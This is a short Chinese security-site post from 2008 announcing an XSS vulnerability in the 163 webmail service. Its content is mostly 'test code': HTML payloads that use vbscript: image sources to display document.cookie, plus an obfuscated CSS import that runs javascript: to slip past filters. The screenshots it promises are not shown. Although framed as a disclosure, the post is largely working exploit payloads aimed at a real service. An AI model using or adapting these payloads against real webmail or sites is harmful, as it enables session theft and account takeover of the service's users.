--------------------------------------------------------------------------------------------
#主题描述# 163邮箱XSS漏洞!【2008/9/16】
--------------------------------------------------------------------------------------------
#内容#

测试代码:

<DIV>&nbsp;<img src="vbscript:a=(msgbox(now))"><img src="vbscript:a=(msgbox(document.cookie))"></DIV>
<DIV>&nbsp;<IMG SRC=''vbscript:msgbox("document.cookie")''> </DIV>
<DIV>&nbsp;<STYLE>@im\port''\ja\vasc\ript:alert(www.sitedir.com.cn)'';</STYLE> </DIV>
<DIV>&nbsp;55555555555555555555555555555555555555</DIV>

以下为截图:


--------------------------------------------------------------------------------------------
转载请注名出处:www.sitedir.com.cn非安全中国网 -